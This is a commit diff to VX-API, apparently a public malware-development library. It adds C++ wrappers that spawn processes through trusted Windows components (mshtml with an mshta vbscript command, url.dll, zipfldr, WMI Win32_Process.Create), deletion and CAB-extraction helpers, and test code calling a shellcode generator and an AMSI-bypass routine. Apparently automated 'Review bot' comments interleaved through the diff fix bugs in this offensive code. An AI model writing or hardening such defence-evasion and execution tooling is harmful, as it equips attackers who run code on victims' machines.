Version: 2.0.709
vxunderground 2023-03-28 04:13:24 -05:00
parent f2f28f9a55
commit 1620dd9894
24 changed files with 844 additions and 165 deletions


@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
# VX-API
Version: 2.0.684
Version: 2.0.709
Developer: smelly__vx
@ -92,6 +92,8 @@ You're free to use this in any manner you please. You do not need to use this en
| XpressMaximumDecompressBuffer | smelly__vx |
| XpressStandardCompressBuffer | smelly__vx |
| XpressStandardDecompressBuffer | smelly__vx |
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu |
| ExtractFilesFromCabIntoTarget | smelly__vx |
## Error Handling
@ -137,6 +139,7 @@ You're free to use this in any manner you please. You do not need to use this en
| GetPidFromPidBruteForcing | modexp |
| GetPidFromNtQueryFileInformation | modexp, Lloyd Davies, Jonas Lyk |
| GetPidFromPidBruteForcingExW | smelly__vx, LLoyd Davies, Jonas Lyk, modexp |
| IsProcessRunningAsAdmin2 | smelly__vx |
## Helper Functions
@ -144,7 +147,6 @@ You're free to use this in any manner you please. You do not need to use this en
| ------------- | --------------- |
| CreateLocalAppDataObjectPath | smelly__vx |
| CreateWindowsObjectPath | smelly__vx |
| DeleteFileWithCreateFileFlag | smelly__vx |
| GetCurrentDirectoryFromUserProcessParameters | smelly__vx |
| GetCurrentProcessIdFromTeb | ReactOS |
| GetCurrentUserSid | Giovanni Dicanio |
@ -212,9 +214,7 @@ You're free to use this in any manner you please. You do not need to use this en
| MpfGetLsaPidFromRegistry | modexp |
| MpfGetLsaPidFromNamedPipe | modexp |
| MpfComMonitorChromeSessionOnce | smelly__vx |
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 |
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey |
| MpfExtractMaliciousPayloadFromZipFileNoPassword | Codu |
| MpfPiControlInjection | SafeBreach Labs |
| MpfPiQueueUserAPCViaAtomBomb | SafeBreach Labs |
| MpfPiWriteProcessMemoryCreateRemoteThread | SafeBreach Labs |
@ -294,6 +294,8 @@ You're free to use this in any manner you please. You do not need to use this en
| ------------- | --------------- |
| CopyFileViaSetupCopyFile | smelly__vx |
| CreateFileFromDsCopyFromSharedFile | Jonas Lyk |
| DeleteDirectoryAndSubDataViaDelNode | smelly__vx |
| DeleteFileWithCreateFileFlag | smelly__vx |
## Process Creation
@ -314,6 +316,7 @@ You're free to use this in any manner you please. You do not need to use this en
| CreateProcessFromPcwUtil | smelly__vx |
| CreateProcessFromShdocVwOpenUrl | smelly__vx |
| CreateProcessFromShell32ShellExecRun | smelly__vx |
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 |
## Rad98 Hooking Engine


@ -24,4 +24,5 @@ PWCHAR CaplockStringW(_In_ PWCHAR Ptr)
sv++;
}
return Ptr;
}
}


@ -5,6 +5,7 @@ BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination)
return SetupDecompressOrCopyFileW(Source, Destination, FILE_COMPRESSION_NONE);
}
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination)
{
WCHAR wSource[MAX_PATH * sizeof(WCHAR)] = { 0 };


@ -1,53 +0,0 @@
#include "Win32Helper.h"
/*
Example .inf file
_______________
///////////////
; ----------------------------------------------------------------------
; Required Sections
; ----------------------------------------------------------------------
[Version]
Signature=$CHICAGO$
Provider=test
Class=Printer
[Manufacturer]
HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
; ----------------------------------------------------------------------
; Models Section
; ----------------------------------------------------------------------
[ModelsSection.NTx86]
UnregisterDlls = Squiblydoo
[ModelsSection.NTia64]
UnregisterDlls = Squiblydoo
[ModelsSection.NTamd64]
UnregisterDlls = Squiblydoo
; ----------------------------------------------------------------------
; Support Sections
; ----------------------------------------------------------------------
[DefaultInstall]
UnregisterDlls = Squiblydoo
[Squiblydoo]
calc.exe
_______________
///////////////
*/
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
{
return FALSE;
}
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection)
{
return FALSE;
}


@ -0,0 +1,43 @@
#include "Win32Helper.h"
//CreateProcessFromMsHTMLW(L"vbscript:CreateObject(\"WScript.Shell\").Run(\"calc.exe\",0)(Window.Close)")
//CreateProcessFromMsHTMLW(L"\"javascript:close((V=(v=new ActiveXObject('SAPI.SpVoice')).GetVoices()).count&&v.Speak('Hello! I am '+V(0).GetAttribute('Gender')))\"");
BOOL CreateProcessFromMsHTMLW(LPCWSTR MshtaCommand)
{
typedef HRESULT(WINAPI* RUNHTMLAPPLICATION)(HINSTANCE, HINSTANCE, LPSTR, INT);
RUNHTMLAPPLICATION RunHtmlApplication = NULL;
HMODULE hMod = NULL;
WCHAR wBinaryBuffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
WCHAR Payload[MAX_PATH * sizeof(WCHAR) * 2] = { 0 };
BOOL bFlag = FALSE;
if (GetProcessPathFromLoaderLoadModuleW(MAX_PATH * sizeof(WCHAR), wBinaryBuffer) == 0)
goto EXIT_ROUTINE;
StringConcatW(Payload, L"\"");
StringConcatW(Payload, wBinaryBuffer);
StringConcatW(Payload, L"\"");
StringConcatW(Payload, L" ");
StringConcatW(Payload, MshtaCommand);
if (!RtlSetBaseUnicodeCommandLine(Payload))
goto EXIT_ROUTINE;
hMod = LoadLibraryW(L"mshtml.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
RunHtmlApplication = (RUNHTMLAPPLICATION)GetProcAddressA((DWORD64)hMod, "RunHTMLApplication");
if (!RunHtmlApplication)
goto EXIT_ROUTINE;
RunHtmlApplication(NULL, NULL, NULL, 0);
bFlag = TRUE;
EXIT_ROUTINE:
return bFlag;
}
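Review bot: The StringConcatW chain that builds `Payload` appends `MshtaCommand` with no check against the `MAX_PATH * sizeof(WCHAR) * 2` array, so a command longer than the remaining space overruns the stack buffer. A guard before the first concat, `if (StringLengthW(wBinaryBuffer) + StringLengthW(MshtaCommand) + 4 >= MAX_PATH * sizeof(WCHAR) * 2) goto EXIT_ROUTINE;`, bounds it conservatively (the 4 covers the two quotes, the space and the terminator). `RunHtmlApplication` is typed as returning an HRESULT, but the result is discarded and `bFlag = TRUE` follows unconditionally, so the wrapper reports success regardless of what the call did; `bFlag = SUCCEEDED(RunHtmlApplication(NULL, NULL, NULL, 0));` would carry it through. The `hMod` from LoadLibraryW is never released either, unlike the sibling wrappers in this commit that call FreeLibrary at EXIT_ROUTINE.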


@ -30,6 +30,7 @@ EXIT_ROUTINE:
return bFlag;
}
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile)
{
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);


@ -1,6 +1,6 @@
#include "Win32Helper.h"
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile)
BOOL CreateProcessFromShell32ShellExecRunW(LPCWSTR PathToFile)
{
typedef VOID(WINAPI* SHELLEXEC_RUNDLLW)(HWND, HINSTANCE, LPCWSTR, INT);
SHELLEXEC_RUNDLLW ShellExec_RunDllW = NULL;
@ -25,7 +25,7 @@ EXIT_ROUTINE:
return bFlag;
}
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile)
BOOL CreateProcessFromShell32ShellExecRunA(LPCSTR PathToFile)
{
typedef VOID(WINAPI* SHELLEXEC_RUNDLLA)(HWND, HINSTANCE, LPCSTR, INT);
SHELLEXEC_RUNDLLA ShellExec_RunDllA = NULL;


@ -0,0 +1,59 @@
#include "Win32Helper.h"
BOOL CreateProcessFromUrlFileProtocolHandlerW(LPCWSTR PathToUrlFile)
{
typedef HINSTANCE(WINAPI* FILEPROTOCOLHANDLERA)(HWND, HINSTANCE, LPCSTR, INT);
FILEPROTOCOLHANDLERA FileProtocolHandlerA = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
goto EXIT_ROUTINE;
hMod = LoadLibraryW(L"url.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
FileProtocolHandlerA = (FILEPROTOCOLHANDLERA)GetProcAddressA((DWORD64)hMod, "FileProtocolHandlerA");
if (!FileProtocolHandlerA)
goto EXIT_ROUTINE;
FileProtocolHandlerA(NULL, NULL, ccPathToUrlFile, SW_SHOW);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
BOOL CreateProcessFromUrlFileProtocolHandlerA(LPCSTR PathToUrlFile)
{
typedef HINSTANCE(WINAPI* FILEPROTOCOLHANDLERA)(HWND, HINSTANCE, LPCSTR, INT);
FILEPROTOCOLHANDLERA FileProtocolHandlerA = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"url.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
FileProtocolHandlerA = (FILEPROTOCOLHANDLERA)GetProcAddressA((DWORD64)hMod, "FileProtocolHandlerA");
if (!FileProtocolHandlerA)
goto EXIT_ROUTINE;
FileProtocolHandlerA(NULL, NULL, PathToUrlFile, SW_SHOW);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
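Review bot: The WCharStringToCharString call in the W variant passes `StringLengthW(PathToUrlFile)` as the third argument, while the prototype visible in the StringManipulation.h hunk of this commit names that parameter `MaximumAllowed`; if that is the destination capacity, as the name suggests, the bound follows the source rather than the `MAX_PATH` array, and a longer path overruns `ccPathToUrlFile`. Passing the real capacity, `if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, MAX_PATH - 1) == 0)`, keeps the copy inside the buffer whatever the input length (confirm the helper's exact semantics in its body, which is not part of this commit). The same pattern recurs in CreateProcessFromUrlOpenUrlW, CreateProcessFromZipfldrRouteCallW and RtlSetBaseUnicodeCommandLine, and with CharStringToWCharString in DeleteDirectoryAndSubDataViaDelNodeA, ExtractFilesFromCabIntoTargetA and IeCreateFileA.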


@ -0,0 +1,59 @@
#include "Win32Helper.h"
BOOL CreateProcessFromUrlOpenUrlW(LPCWSTR PathToUrlFile)
{
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
OPENURL OpenUrl = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
goto EXIT_ROUTINE;
hMod = LoadLibraryW(L"url.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");
if (!OpenUrl)
goto EXIT_ROUTINE;
OpenUrl(NULL, NULL, ccPathToUrlFile);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
BOOL CreateProcessFromUrlOpenUrlA(LPCSTR PathToUrlFile)
{
typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
OPENURL OpenUrl = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"url.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenUrl");
if (!OpenUrl)
goto EXIT_ROUTINE;
OpenUrl(NULL, NULL, PathToUrlFile);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
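Review bot: The export name differs between the two variants: the W variant resolves `"OpenURL"` while the A variant resolves `"OpenUrl"`. Export lookups are case-sensitive, so at most one spelling resolves and the other variant always fails its `if (!OpenUrl)` check; the spelling I know url.dll to export is `OpenURL`, so the A variant's line should read `OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");`. A single internal routine taking an `LPCSTR` that both wrappers call would also remove the duplicated load/resolve/free sequence and keep the two from drifting again.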


@ -0,0 +1,115 @@
#include "Win32Helper.h"
DWORD CreateProcessFromWmiWin32_ProcessW(LPCWSTR BinaryPath)
{
HRESULT Result;
IWbemLocator* Locator = NULL;
IWbemServices* Services = NULL;
IWbemClassObject* Win32ProcessStartupObject = NULL;
IWbemClassObject* StartupInstance = NULL;
IWbemClassObject* Win32ProcessObject = NULL;
IWbemClassObject* ParameterInformationObject = NULL;
IWbemClassObject* ParametersObject = NULL;
IWbemClassObject* StartupResponseObject = NULL;
VARIANT varCommand;
VARIANT vtDispatch;
BOOL bFlag = FALSE;
DWORD dwError = ERROR_SUCCESS;
Result = CoInitializeEx(0, COINIT_MULTITHREADED);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = CoCreateInstance(CLSID_WbemLocator, NULL, 1, IID_IWbemLocator, (LPVOID*)&Locator);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Locator->ConnectServer((BSTR)L"ROOT\\CIMV2", NULL, NULL, 0, NULL, 0, 0, &Services);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = CoSetProxyBlanket(Services, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Services->GetObjectW((BSTR)L"Win32_ProcessStartup", 0, NULL, &Win32ProcessStartupObject, NULL);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Win32ProcessStartupObject->SpawnInstance(0, &StartupInstance);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Services->GetObjectW((BSTR)L"Win32_Process", 0, NULL, &Win32ProcessObject, NULL);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Win32ProcessObject->GetMethod((BSTR)L"Create", 0, &ParameterInformationObject, NULL);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = ParameterInformationObject->SpawnInstance(0, &ParametersObject);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
VariantInit(&varCommand);
varCommand.vt = VT_BSTR;
varCommand.bstrVal = (BSTR)BinaryPath;
Result = ParametersObject->Put((BSTR)L"CommandLine", 0, &varCommand, 0);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
VariantInit(&vtDispatch);
vtDispatch.vt = VT_DISPATCH;
vtDispatch.byref = StartupInstance;
Result = ParametersObject->Put((BSTR)L"ProcessStartupInformation", 0, &vtDispatch, 0);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
Result = Services->ExecMethod((BSTR)L"Win32_Process", (BSTR)L"Create", 0, NULL, ParametersObject, &StartupResponseObject, NULL);
if (!SUCCEEDED(Result))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (!bFlag)
{
if (Result != S_OK)
dwError = Win32FromHResult(Result);
else
dwError = GetLastErrorFromTeb();
}
if (Locator)
Locator->Release();
if (Services)
Services->Release();
if (Win32ProcessStartupObject)
Win32ProcessStartupObject->Release();
if (StartupInstance)
StartupInstance->Release();
if (Win32ProcessObject)
Win32ProcessObject->Release();
if (ParameterInformationObject)
ParameterInformationObject->Release();
if (ParametersObject)
ParametersObject->Release();
if (StartupResponseObject)
StartupResponseObject->Release();
CoUninitialize();
return dwError;
}
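Review bot: `varCommand.bstrVal = (BSTR)BinaryPath;` stores a plain `LPCWSTR` in a `VT_BSTR` variant; a BSTR carries a length prefix before its characters, and a consumer that calls SysStringLen on it reads the bytes preceding the caller's string. Allocate a real BSTR with `varCommand.bstrVal = SysAllocString(BinaryPath);`, fail on NULL, initialize both variants at their declaration so cleanup is safe on early exits, and release with `VariantClear(&varCommand)` at EXIT_ROUTINE; the `(BSTR)L"..."` casts on the namespace, class and method names have the same problem. `CoUninitialize()` at the end runs even when `CoInitializeEx` failed at the top, which unbalances COM initialization for the thread; jump past it on that path. `StartupResponseObject` is released without reading its `ReturnValue`, so a Win32_Process.Create that was dispatched but failed inside WMI still yields ERROR_SUCCESS.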


@ -0,0 +1,59 @@
#include "Win32Helper.h"
BOOL CreateProcessFromZipfldrRouteCallW(LPCWSTR PathToFile)
{
typedef VOID(WINAPI* ROUTETHECALL)(HWND, HINSTANCE, LPCSTR);
ROUTETHECALL RouteTheCall = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
CHAR ccPath[MAX_PATH] = { 0 };
hMod = LoadLibraryW(L"zipfldr.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
if (WCharStringToCharString(ccPath, (PWCHAR)PathToFile, StringLengthW(PathToFile)) == NULL)
goto EXIT_ROUTINE;
RouteTheCall = (ROUTETHECALL)GetProcAddressA((DWORD64)hMod, "RouteTheCall");
if (!RouteTheCall)
goto EXIT_ROUTINE;
RouteTheCall(NULL, NULL, ccPath);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
BOOL CreateProcessFromZipfldrRouteCallA(LPCSTR PathToFile)
{
typedef VOID(WINAPI* ROUTETHECALL)(HWND, HINSTANCE, LPCSTR);
ROUTETHECALL RouteTheCall = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"zipfldr.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
RouteTheCall = (ROUTETHECALL)GetProcAddressA((DWORD64)hMod, "RouteTheCall");
if (!RouteTheCall)
goto EXIT_ROUTINE;
RouteTheCall(NULL, NULL, PathToFile);
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
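Review bot: `WCharStringToCharString(...) == NULL` compares a `SIZE_T` return value against a pointer constant; the sibling wrappers in this commit (CreateProcessFromUrlFileProtocolHandlerW, CreateProcessFromUrlOpenUrlW) write `== 0` for the same check. Change it to `if (WCharStringToCharString(ccPath, (PWCHAR)PathToFile, StringLengthW(PathToFile)) == 0)`. The W variant also loads zipfldr.dll before converting the path, so a conversion failure still pays for a LoadLibrary/FreeLibrary round trip; converting first, as the url.dll variants do, avoids that.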


@ -0,0 +1,61 @@
#include "Win32Helper.h"
BOOL DeleteDirectoryAndSubDataViaDelNodeW(LPCWSTR FullPathToDirectory)
{
DELNODEW DelNodeW = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"advpack.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
DelNodeW = (DELNODEW)GetProcAddressA((DWORD64)hMod, "DelNodeW");
if (!DelNodeW)
goto EXIT_ROUTINE;
if (!SUCCEEDED(DelNodeW(FullPathToDirectory, 0)))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
BOOL DeleteDirectoryAndSubDataViaDelNodeA(LPCSTR FullPathToDirectory)
{
DELNODEW DelNodeW = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
WCHAR ccBuffer[MAX_PATH * sizeof(WCHAR)] = {0};
if(CharStringToWCharString(ccBuffer, (PCHAR)FullPathToDirectory, StringLengthA(FullPathToDirectory)) == 0)
goto EXIT_ROUTINE;
hMod = LoadLibraryW(L"advpack.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
DelNodeW = (DELNODEW)GetProcAddressA((DWORD64)hMod, "DelNodeW");
if (!DelNodeW)
goto EXIT_ROUTINE;
if (!SUCCEEDED(DelNodeW(ccBuffer, 0)))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
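Review bot: `WCHAR ccBuffer[MAX_PATH * sizeof(WCHAR)]` declares `MAX_PATH * 2` wide characters, not `MAX_PATH` characters' worth of bytes: `sizeof(WCHAR)` counts bytes while the array dimension counts elements, so the buffer is twice what the name implies and the intent is unclear to a reader. `WCHAR ccBuffer[MAX_PATH] = { 0 };` states the intended capacity, and whichever size is kept, the bound passed to CharStringToWCharString should be derived from it (`sizeof ccBuffer / sizeof ccBuffer[0]`) rather than from the source length. The same idiom appears in ExtractFilesFromCabIntoTargetA, IeCreateFileA, CreateProcessFromMsHTMLW and Main.cpp in this commit.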


@ -0,0 +1,64 @@
#include "Win32Helper.h"
BOOL ExtractFilesFromCabIntoTargetW(LPCWSTR CabFile, LPCWSTR OutputDirectory)
{
EXTRACTFILESW ExtractFilesW = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"advpack.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
ExtractFilesW = (EXTRACTFILESW)GetProcAddressA((DWORD64)hMod, "ExtractFilesW");
if (!ExtractFilesW)
goto EXIT_ROUTINE;
if (!SUCCEEDED(ExtractFilesW(CabFile, OutputDirectory, 0, NULL, NULL, 0)))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
BOOL ExtractFilesFromCabIntoTargetA(LPCSTR CabFile, LPCSTR OutputDirectory)
{
EXTRACTFILESW ExtractFilesW = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
WCHAR ccCab[MAX_PATH * sizeof(WCHAR)] = {0};
WCHAR ccOut[MAX_PATH * sizeof(WCHAR)] = { 0 };
if (CharStringToWCharString(ccCab, (PCHAR)CabFile, StringLengthA(CabFile)) == 0)
goto EXIT_ROUTINE;
if (CharStringToWCharString(ccOut, (PCHAR)OutputDirectory, StringLengthA(OutputDirectory)) == 0)
goto EXIT_ROUTINE;
hMod = LoadLibraryW(L"advpack.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
ExtractFilesW = (EXTRACTFILESW)GetProcAddressA((DWORD64)hMod, "ExtractFilesW");
if (!ExtractFilesW)
goto EXIT_ROUTINE;
if (!SUCCEEDED(ExtractFilesW(ccCab, ccOut, 0, NULL, NULL, 0)))
goto EXIT_ROUTINE;
bFlag = TRUE;
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}


@ -83,7 +83,15 @@ typedef NTSTATUS(NTAPI* SYSTEMFUNCTION032)(PAB_STRING, PAB_STRING);
///*******************************************
// IMAGEHLP IMPORT
//*******************************************/
typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);
/*******************************************
IMAGEHLP IMPORT
/*******************************************/
typedef BOOL(WINAPI* IMAGEGETDIGESTSTREAM)(HANDLE, DWORD, LPVOID, PHANDLE);
/*******************************************
ADVPACK IMPORT
/*******************************************/
typedef HRESULT(WINAPI* DELNODEW)(LPCWSTR, DWORD);
typedef BOOL(WINAPI* ISNTADMIN)(DWORD, LPDWORD);
typedef HRESULT(WINAPI* EXTRACTFILESW)(LPCWSTR, LPCWSTR, DWORD, LPCWSTR, LPVOID, DWORD);
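Review bot: The closing line of each new banner, `/*******************************************/`, starts a second `/*` while the comment opened two lines above is still open; GCC and Clang flag a `/*` inside a block comment under -Wcomment, and the removed IMAGEHLP banner avoided this by prefixing every line with `//`. Writing the closing line as ` *******************************************/`, or keeping the `//`-prefixed form of the removed lines, removes the nested opener. This applies to both the IMAGEHLP and ADVPACK banners in this hunk.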

29
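--- a/VX-API/IeCreateFile.cpp
+++ b/VX-API/IeCreateFile.cpp
@@ -0,0 +1,29 @@
+#include "Win32Helper.h"
+HANDLE IeCreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
+{
+typedef HANDLE(WINAPI* IECREATEFILE)(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
+IECREATEFILE IeCreateFile = NULL;
+IeCreateFile = (IECREATEFILE)GetProcAddressA((DWORD64)TryLoadDllMultiMethodW((PWCHAR)L"ieframe.dll"), "IECreateFile");
+if (!IeCreateFile)
+return NULL;
+return IeCreateFile(lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile);
+}
+HANDLE IeCreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile)
+{
+typedef HANDLE(WINAPI* IECREATEFILE)(LPCWSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
+IECREATEFILE IeCreateFile = NULL;
+WCHAR ccBuffer[MAX_PATH * sizeof(WCHAR)] = { 0 };
+IeCreateFile = (IECREATEFILE)GetProcAddressA((DWORD64)TryLoadDllMultiMethodW((PWCHAR)L"ieframe.dll"), "IECreateFile");
+if (!IeCreateFile)
+return NULL;
+if (CharStringToWCharString(ccBuffer, (PCHAR)lpFileName, StringLengthA(lpFileName)) == 0)
+return NULL;
+return IeCreateFile(ccBuffer, dwDesiredAccess, dwShareMode, lpSecurityAttributes, dwCreationDisposition, dwFlagsAndAttributes, hTemplateFile);
+}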
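Review bot: Both wrappers signal failure with `NULL` at `if (!IeCreateFile) return NULL;` and at the conversion check, but a caller written against CreateFileW's contract tests for `INVALID_HANDLE_VALUE`; if the resolved IECreateFile follows that convention (its body is not visible here), callers now have to check two different sentinels. Returning `INVALID_HANDLE_VALUE` from the wrapper's own failure paths, or a header comment stating that NULL means "could not resolve ieframe!IECreateFile or convert the path", keeps the contract uniform. `TryLoadDllMultiMethodW`'s result is also cast straight to `DWORD64` and handed to GetProcAddressA with no NULL check, so a failed load relies on GetProcAddressA tolerating a zero module base — worth confirming in that helper, which is not part of this commit.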


@ -0,0 +1,25 @@
#include "Win32Helper.h"
BOOL IsProcessRunningAsAdmin2(VOID)
{
ISNTADMIN IsNtAdmin = NULL;
HMODULE hMod = NULL;
BOOL bFlag = FALSE;
hMod = LoadLibraryW(L"advpack.dll");
if (hMod == NULL)
goto EXIT_ROUTINE;
IsNtAdmin = (ISNTADMIN)GetProcAddressA((DWORD64)hMod, "IsNTAdmin");
if (!IsNtAdmin)
goto EXIT_ROUTINE;
bFlag = IsNtAdmin(0, NULL);
EXIT_ROUTINE:
if (hMod)
FreeLibrary(hMod);
return bFlag;
}
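Review bot: The function returns FALSE both when the caller is not an administrator and when advpack.dll or its `IsNTAdmin` export cannot be resolved, so the two outcomes are indistinguishable to the caller. A header comment making that explicit, e.g. `// Returns FALSE both when the caller is not an administrator and when advpack!IsNTAdmin could not be resolved; callers that need to tell the cases apart should use IsProcessRunningAsAdmin instead`, or a separate BOOL out-parameter for the admin result, would document the contract. The `IsNtAdmin(0, NULL)` arguments are also unexplained; I cannot tell from the `ISNTADMIN` typedef what the DWORD and LPDWORD denote, so a one-line comment on why they are zero and NULL would help the next reader.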


@ -2,15 +2,24 @@
INT main(VOID)
{
//////////////////////////////////////////////////////////////////////////
//
// The following variables are used for VX-API development and debugging,
// they do not serve any purpose and can be removed.
//
//////////////////////////////////////////////////////////////////////////
DWORD dwSize = 0;
PCHAR Buffer = GenericShellcodeOpenCalcExitThread(&dwSize);
PCHAR ppShellcodeBuffer = GenericShellcodeOpenCalcExitThread(&dwSize);
WCHAR wBuffer[MAX_PATH * sizeof(WCHAR)] = L"C:\\Windows\\System32\\calc.exe";
CHAR cBuffer[MAX_PATH] = "C:\\Windows\\System32\\calc.exe";
//////////////////////////////////////////////////////////////////////////
//
// Test area
//
//////////////////////////////////////////////////////////////////////////
//MpfSceViaSymEnumSourceFiles((PBYTE)Buffer, dwSize);
//BOOL bFlag = AmsiBypassViaPatternScan(4288);
CreateProcessFromShell32ShellExecRunDllW(L"C:\\Windows\\System32\\calc.exe");
return ERROR_SUCCESS;
}
Sleep(1);
return 0;
}
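Review bot: `ppShellcodeBuffer` carries a `pp` prefix that signals pointer-to-pointer, but its type is `PCHAR`; the previous name `Buffer` was at least not misleading, so `pShellcodeBuffer`, or no prefix as `wBuffer` and `cBuffer` use, would match the file's own naming. The buffer returned by GenericShellcodeOpenCalcExitThread is neither used nor released before `return 0`, and `wBuffer`/`cBuffer` are likewise unused, so the harness builds with unused-variable warnings; if the helper heap-allocates (not visible here) it also leaks on each run. Since the comment block above says these are scratch variables, either drop them or reference them once so the build stays warning-clean.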


@ -0,0 +1,21 @@
#include "StringManipulation.h"
VOID RtlInitAnsiString(_Inout_ PANSI_STRING DestinationString, _In_ PCSTR SourceString)
{
SIZE_T Size;
if (SourceString)
{
Size = StringLengthA(SourceString);
if (Size > (65535 - sizeof(CHAR))) Size = 65535 - sizeof(CHAR);
DestinationString->Length = (USHORT)Size;
DestinationString->MaximumLength = (USHORT)Size + sizeof(CHAR);
}
else
{
DestinationString->Length = 0;
DestinationString->MaximumLength = 0;
}
DestinationString->Buffer = (PCHAR)SourceString;
}
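Review bot: `65535` appears twice as a bare literal in the clamp; `USHRT_MAX` from `<limits.h>` (or the Windows `MAXUSHORT`) names the bound the `USHORT` fields impose, e.g. `if (Size > (USHRT_MAX - sizeof(CHAR))) Size = USHRT_MAX - sizeof(CHAR);`. `DestinationString->Buffer = (PCHAR)SourceString;` aliases the caller's string rather than copying it and the cast drops the `const` from `PCSTR`, so a header comment that the ANSI_STRING borrows `SourceString` (the caller keeps it alive and must not expect a copy) would document the ownership, mirroring RtlInitUnicodeString declared next to it in StringManipulation.h.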


